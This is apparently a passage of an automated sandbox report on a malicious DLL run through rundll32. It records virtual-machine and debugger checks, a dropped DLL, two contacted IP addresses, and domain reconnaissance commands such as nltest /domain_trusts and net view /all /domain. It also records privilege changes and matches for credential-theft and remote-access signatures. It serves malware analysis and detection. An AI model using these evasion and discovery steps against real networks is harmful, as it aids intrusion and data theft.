Source: C:\Windows\System32\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\cmd.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\conhost.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\cmd.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\conhost.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\systeminfo.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\systeminfo.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\systeminfo.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\systeminfo.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\cmd.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\conhost.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\cmd.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\conhost.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\cmd.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\conhost.exe Process information set: NOOPENFILEERRORBOX Jump to behavior

Malware Analysis System Evasion

Source: C:\Windows\System32\rundll32.exe Code function: EnterCriticalSection,memset,GetModuleFileNameW,PathAppendW,StrStrIW,PathFileExistsW,PathAppendW,PathFileExistsW,memset,SHGetValueW,PathAppendW,PathFileExistsW,LoadLibraryW,GetProcAddress,GetProcAddress,GetModuleFileNameW,PathAppendW,PathFileExistsW,PathAppendW,PathFileExistsW,memset,SHGetValueW,PathAppendW,PathFileExistsW,LoadLibraryW,GetProcAddress,GetProcAddress,LeaveCriticalSection, 3_2_00000001800655A8
Source: C:\Windows\System32\rundll32.exe Code function: 3_2_0000000180049AEC 3_2_0000000180049AEC
Source: C:\Windows\System32\systeminfo.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_NetworkAdapter
Source: C:\Windows\System32\rundll32.exe Code function: GetAdaptersInfo,GetAdaptersInfo, 4_2_00000203431C68E8
Source: C:\Windows\System32\rundll32.exe Code function: GetAdaptersInfo,GetAdaptersInfo,wsprintfA,wsprintfA,wsprintfA,GetComputerNameExA,wsprintfA,GetComputerNameExA,wsprintfA, 4_2_00000203431C7FA8
Source: C:\Windows\System32\rundll32.exe Code function: GetAdaptersInfo,GetAdaptersInfo, 9_2_00000223801368E8
Source: C:\Windows\System32\rundll32.exe Code function: GetAdaptersInfo,GetAdaptersInfo,wsprintfA,wsprintfA,wsprintfA,GetComputerNameExA,wsprintfA,GetComputerNameExA,wsprintfA, 9_2_0000022380137FA8
Source: C:\Windows\System32\rundll32.exe Window / User API: threadDelayed 825
Source: C:\Windows\System32\rundll32.exe Window / User API: threadDelayed 8912
Source: C:\Windows\System32\rundll32.exe Dropped PE file which has not been started: C:\Users\user\AppData\Roaming\Custom_update\Update_79066994.dll
Source: C:\Windows\System32\rundll32.exe API coverage: 0.1 %
Source: C:\Windows\System32\rundll32.exe Code function: 3_2_0000000180049AEC 3_2_0000000180049AEC
Source: C:\Windows\System32\rundll32.exe TID: 4288 Thread sleep count: 262 > 30
Source: C:\Windows\System32\rundll32.exe TID: 4288 Thread sleep time: -262000s >= -30000s
Source: C:\Windows\System32\rundll32.exe TID: 4424 Thread sleep count: 825 > 30
Source: C:\Windows\System32\rundll32.exe TID: 4424 Thread sleep time: -82500s >= -30000s
Source: C:\Windows\System32\rundll32.exe TID: 4288 Thread sleep count: 8912 > 30
Source: C:\Windows\System32\rundll32.exe TID: 4288 Thread sleep time: -8912000s >= -30000s
Source: C:\Windows\System32\systeminfo.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BIOS
Source: C:\Windows\System32\systeminfo.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\System32\systeminfo.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\net.exe net view /all /domain
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Source: C:\Windows\System32\rundll32.exe Code function: 4_2_00000203431CA350 FindFirstFileW,FindNextFileW,LoadLibraryW, 4_2_00000203431CA350
Source: C:\Windows\System32\rundll32.exe Code function: 4_2_00000203431C1A08 FindFirstFileA,wsprintfA,FindNextFileA,FindClose, 4_2_00000203431C1A08
Source: C:\Windows\System32\rundll32.exe Code function: 9_2_000002238013A350 FindFirstFileW,FindNextFileW,LoadLibraryW, 9_2_000002238013A350
Source: C:\Windows\System32\rundll32.exe Code function: 9_2_0000022380131A08 FindFirstFileA,wsprintfA,FindNextFileA,FindClose, 9_2_0000022380131A08
Source: Amcache.hve.8.dr Binary or memory string: VMware
Source: rundll32.exe, 00000009.00000002.3284739426.00000223FFE88000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: MWrod_VMware_SATA_CD00#4&224f42ef&
Source: rundll32.exe, 00000004.00000002.2040462096.0000020342FFE000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: rod_VMware_SATA_CD00
Source: Amcache.hve.8.dr Binary or memory string: VMware Virtual USB Mouse
Source: Amcache.hve.8.dr Binary or memory string: vmci.syshbin
Source: Amcache.hve.8.dr Binary or memory string: VMware, Inc.
Source: Amcache.hve.8.dr Binary or memory string: VMware20,1hbin@
Source: Amcache.hve.8.dr Binary or memory string: c:\windows\system32\driverstore\filerepository\vmci.inf_amd64_68ed49469341f563
Source: Amcache.hve.8.dr Binary or memory string: Ascsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/4&224f42ef&0&000000
Source: Amcache.hve.8.dr Binary or memory string: .Z$c:/windows/system32/drivers/vmci.sys
Source: rundll32.exe, 00000009.00000002.3284739426.00000223FFF23000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000009.00000002.3284739426.00000223FFED9000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW
Source: Amcache.hve.8.dr Binary or memory string: :scsi/disk&ven_vmware&prod_virtual_disk/4&1656f219&0&000000
Source: Amcache.hve.8.dr Binary or memory string: pci\ven_15ad&dev_0740&subsys_074015ad,pci\ven_15ad&dev_0740,root\vmwvmcihostdev
Source: rundll32.exe, 00000009.00000002.3284572654.00000223820D0000.00000040.00001000.00020000.00000000.sdmp Binary or memory string: Hyper-V Requirements: VM Monitor Mode Extensions: No
Source: Amcache.hve.8.dr Binary or memory string: c:/windows/system32/drivers/vmci.sys
Source: Amcache.hve.8.dr Binary or memory string: scsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/4&224f42ef&0&000000
Source: rundll32.exe, 00000009.00000002.3284739426.00000223FFEEA000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAWU
Source: Amcache.hve.8.dr Binary or memory string: vmci.sys
Source: Amcache.hve.8.dr Binary or memory string: VMware-56 4d 43 71 48 15 3d ed-ae e6 c7 5a ec d9 3b f0
Source: Amcache.hve.8.dr Binary or memory string: vmci.syshbin`
Source: Amcache.hve.8.dr Binary or memory string: \driver\vmci,\driver\pci
Source: Amcache.hve.8.dr Binary or memory string: scsi/disk&ven_vmware&prod_virtual_disk/4&1656f219&0&000000
Source: Amcache.hve.8.dr Binary or memory string: VMware20,1
Source: Amcache.hve.8.dr Binary or memory string: Microsoft Hyper-V Generation Counter
Source: Amcache.hve.8.dr Binary or memory string: NECVMWar VMware SATA CD00
Source: Amcache.hve.8.dr Binary or memory string: VMware Virtual disk SCSI Disk Device
Source: Amcache.hve.8.dr Binary or memory string: scsi\cdromnecvmwarvmware_sata_cd001.00,scsi\cdromnecvmwarvmware_sata_cd00,scsi\cdromnecvmwar,scsi\necvmwarvmware_sata_cd001,necvmwarvmware_sata_cd001,gencdrom
Source: Amcache.hve.8.dr Binary or memory string: scsi\diskvmware__virtual_disk____2.0_,scsi\diskvmware__virtual_disk____,scsi\diskvmware__,scsi\vmware__virtual_disk____2,vmware__virtual_disk____2,gendisk
Source: Amcache.hve.8.dr Binary or memory string: Microsoft Hyper-V Virtualization Infrastructure Driver
Source: Amcache.hve.8.dr Binary or memory string: VMware PCI VMCI Bus Device
Source: Amcache.hve.8.dr Binary or memory string: VMware VMCI Bus Device
Source: Amcache.hve.8.dr Binary or memory string: VMware Virtual RAM
Source: Amcache.hve.8.dr Binary or memory string: BiosVendor:VMware, Inc.,BiosVersion:VMW201.00V.20829224.B64.2211211842,BiosReleaseDate:11/21/2022,BiosMajorRelease:0xff,BiosMinorRelease:0xff,SystemManufacturer:VMware, Inc.,SystemProduct:VMware20,1,SystemFamily:,SystemSKUNumber:,BaseboardManufacturer:,BaseboardProduct:,BaseboardVersion:,EnclosureType:0x1
Source: Amcache.hve.8.dr Binary or memory string: vmci.inf_amd64_68ed49469341f563
Source: C:\Windows\System32\rundll32.exe API call chain: ExitProcess graph end node
Source: C:\Windows\System32\loaddll64.exe Process queried: DebugPort
Source: C:\Windows\System32\rundll32.exe Process queried: DebugPort
Source: C:\Windows\System32\rundll32.exe Code function: 3_2_0000000180070760 IsProcessorFeaturePresent,memset,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess, 3_2_0000000180070760
Source: C:\Windows\System32\rundll32.exe Code function: 3_2_0000000180066C3C memset,GetLastError,IsDebuggerPresent,OutputDebugStringW, 3_2_0000000180066C3C
Source: C:\Windows\System32\rundll32.exe Code function: 3_2_00000001800033E0 memset,memset,memset,memset,CreateFileW,GetFileInformationByHandle,ReadFile,ReadFile,CoTaskMemAlloc,ReadFile,CoTaskMemFree,SetFilePointer,ReadFile,SetFilePointer,ReadFile,SetFilePointer,??_U@YAPEAX_K@Z,ReadFile,??_U@YAPEAX_K@Z,ReadFile,??_U@YAPEAX_K@Z,ReadFile,??_U@YAPEAX_K@Z,ReadFile,PathRemoveFileSpecW,PathCombineW,PathRemoveFileSpecW,PathCombineW,free,??_U@YAPEAX_K@Z,ReadFile,ReadFile,SetFilePointer,ReadFile,ReadFile,ReadFile,ILFree,ReadFile,memset,GetSystemDirectoryW,LoadLibraryW,GetProcAddress,CoTaskMemFree,GetLastError,FreeLibrary,CloseHandle,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,SetLastError, 3_2_00000001800033E0
Source: C:\Windows\System32\rundll32.exe Code function: 3_2_000000018000A7AC GetProcessHeap, 3_2_000000018000A7AC
Source: C:\Windows\System32\rundll32.exe Code function: 3_2_0000000180070760 IsProcessorFeaturePresent,memset,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess, 3_2_0000000180070760
Source: C:\Windows\System32\rundll32.exe Code function: 3_2_000000018006F6E0 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess, 3_2_000000018006F6E0

HIPS / PFW / Operating System Protection Evasion

Source: C:\Windows\System32\rundll32.exe Network Connect: 172.67.219.28 443
Source: C:\Windows\System32\rundll32.exe Network Connect: 172.67.136.103 443
Source: C:\Windows\System32\rundll32.exe Code function: 3_2_0000000180066A50 memset,GetModuleFileNameW,GetCommandLineW,memset,ShellExecuteExW,CloseHandle, 3_2_0000000180066A50
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\rundll32.exe rundll32.exe "C:\Users\user\Desktop\360total.dll.dll",#1
Source: C:\Windows\System32\rundll32.exe Process created: C:\Windows\System32\cmd.exe /c ipconfig /all
Source: C:\Windows\System32\rundll32.exe Process created: C:\Windows\System32\cmd.exe /c systeminfo
Source: C:\Windows\System32\rundll32.exe Process created: C:\Windows\System32\cmd.exe /c nltest /domain_trusts
Source: C:\Windows\System32\rundll32.exe Process created: C:\Windows\System32\cmd.exe /c nltest /domain_trusts /all_trusts
Source: C:\Windows\System32\rundll32.exe Process created: C:\Windows\System32\cmd.exe /c net view /all /domain
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\ipconfig.exe ipconfig /all
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\systeminfo.exe systeminfo
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\nltest.exe nltest /domain_trusts
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\nltest.exe nltest /domain_trusts /all_trusts
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\net.exe net view /all /domain
Source: C:\Windows\System32\rundll32.exe Code function: 3_2_000000018004A650 memset,GetModuleFileNameW,PathAppendW,ShellExecuteExW,ILGetSize,GetTickCount,srand,GetCurrentProcess,GetProcessId,GetCurrentThreadId,rand,LocalAlloc,InitializeSecurityDescriptor,LocalFree,SetSecurityDescriptorDacl,CreateFileMappingW,LocalFree,CreateFileMappingW,MapViewOfFile,CloseHandle,memset,memmove,memmove,memmove,memmove,memmove,UnmapViewOfFile,FindWindowW,SetForegroundWindow,memset,wsprintfW,memset,WaitForSingleObject,Sleep,CloseHandle,CloseHandle,CloseHandle, 3_2_000000018004A650
Source: C:\Windows\System32\rundll32.exe Code function: 3_2_0000000180049278 LookupPrivilegeValueW,LookupPrivilegeValueW,LookupPrivilegeValueW,LookupPrivilegeValueW,??_U@YAPEAX_K@Z,GetCurrentProcess,OpenProcessToken,CreateRestrictedToken,CloseHandle,CloseHandle,AllocateAndInitializeSid,GetLengthSid,SetTokenInformation,FreeSid,AdjustTokenPrivileges,??_V@YAXPEAX@Z, 3_2_0000000180049278
Source: Update_79066994.dll.4.dr Binary or memory string: Program managerProgmanSeShutdownPrivilegeSeTimeZonePrivilegeSeIncreaseWorkingSetPrivilegeSeUndockPrivilegeSeAssignPrimaryTokenPrivilegeSeIncreaseQuotaPrivilegeEnableLUASoftware\Microsoft\Windows\CurrentVersion\Policies\Systemseclogonwdc.dllWdcRunTaskAsInteractiveUser"%s" %swinsta0\defaultadvapi32.dllCreateProcessWithTokenW:open..\360DeskAna64.exe%u_%d_%d_%d_%use2/%s %s %use1SeTcbPrivilegeNT AUTHORITYLOCAL SERVICENETWORK SERVICE360utilexplorer.exe,
Source: rundll32.exe Binary or memory string: Progman
Source: rundll32.exe Binary or memory string: Program manager
Source: C:\Windows\System32\rundll32.exe Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\rundll32.exe Code function: 3_2_000000018006A304 GetSystemTimeAsFileTime, 3_2_000000018006A304
Source: C:\Windows\System32\rundll32.exe Code function: 4_2_00000203431C8AE0 GetUserNameA,wsprintfA, 4_2_00000203431C8AE0
Source: C:\Windows\System32\rundll32.exe Code function: 3_2_0000000180040CB0 GetVersionExW,memset,SHGetValueW,atoi,GetVersion,GetModuleHandleW,GetProcAddress, 3_2_0000000180040CB0
Source: C:\Windows\System32\nltest.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid
Source: Amcache.hve.8.dr Binary or memory string: c:\programdata\microsoft\windows defender\platform\4.18.23080.2006-0\msmpeng.exe
Source: Amcache.hve.8.dr Binary or memory string: msmpeng.exe
Source: Amcache.hve.8.dr Binary or memory string: c:\program files\windows defender\msmpeng.exe
Source: rundll32.exe Binary or memory string: 360tray.exe
Source: rundll32.exe Binary or memory string: SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\App Paths\360safe.exe
Source: rundll32.exe Binary or memory string: SOFTWARE\Microsoft\Windows\CurrentVersion\App Paths\360safe.exe
Source: Amcache.hve.8.dr Binary or memory string: MsMpEng.exe

Stealing of Sensitive Information

Source: Yara match File source: 3.2.rundll32.exe.26c61e20000.2.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 4.2.rundll32.exe.20342fe0000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 4.2.rundll32.exe.20342fe0000.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 4.2.rundll32.exe.203431c0000.2.unpack, type: UNPACKEDPE
Source: Yara match File source: 9.2.rundll32.exe.22380120000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 3.2.rundll32.exe.26c61e20000.2.unpack, type: UNPACKEDPE
Source: Yara match File source: 3.2.rundll32.exe.26c61e10000.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 4.2.rundll32.exe.203431c0000.2.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 9.2.rundll32.exe.22380130000.2.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 9.2.rundll32.exe.22380120000.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 9.2.rundll32.exe.22380130000.2.unpack, type: UNPACKEDPE
Source: Yara match File source: 3.2.rundll32.exe.26c61e10000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000009.00000002.3284037566.0000022380120000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000004.00000002.2040445129.0000020342FE0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000009.00000003.2909305037.0000022381EB0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000004.00000002.2040526568.00000203431C0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000009.00000002.3283619847.000000A88ED78000.00000004.00000010.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000009.00000003.2979519134.0000022380230000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000009.00000003.3110926112.0000022380230000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000002.2158647911.0000026C61E20000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000009.00000002.3284079772.0000022380130000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000009.00000002.3284387768.0000022381EB0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000009.00000003.2856557891.0000022380230000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000002.2158630473.0000026C61E10000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: rundll32.exe PID: 2928, type: MEMORYSTR
Source: Yara match File source: decrypted.memstr, type: MEMORYSTR

Remote Access Functionality

Source: Yara match File source: 3.2.rundll32.exe.26c61e20000.2.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 4.2.rundll32.exe.20342fe0000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 4.2.rundll32.exe.20342fe0000.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 4.2.rundll32.exe.203431c0000.2.unpack, type: UNPACKEDPE
Source: Yara match File source: 9.2.rundll32.exe.22380120000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 3.2.rundll32.exe.26c61e20000.2.unpack, type: UNPACKEDPE
Source: Yara match File source: 3.2.rundll32.exe.26c61e10000.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 4.2.rundll32.exe.203431c0000.2.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 9.2.rundll32.exe.22380130000.2.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 9.2.rundll32.exe.22380120000.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 9.2.rundll32.exe.22380130000.2.unpack, type: UNPACKEDPE
Source: Yara match File source: 3.2.rundll32.exe.26c61e10000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000009.00000002.3284037566.0000022380120000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000004.00000002.2040445129.0000020342FE0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000009.00000003.2909305037.0000022381EB0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000004.00000002.2040526568.00000203431C0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000009.00000002.3283619847.000000A88ED78000.00000004.00000010.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000009.00000003.2979519134.0000022380230000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000009.00000003.3110926112.0000022380230000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000002.2158647911.0000026C61E20000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000009.00000002.3284079772.0000022380130000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000009.00000002.3284387768.0000022381EB0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000009.00000003.2856557891.0000022380230000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000002.2158630473.0000026C61E10000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: rundll32.exe PID: 2928, type: MEMORYSTR
Source: Yara match File source: decrypted.memstr, type: MEMORYSTR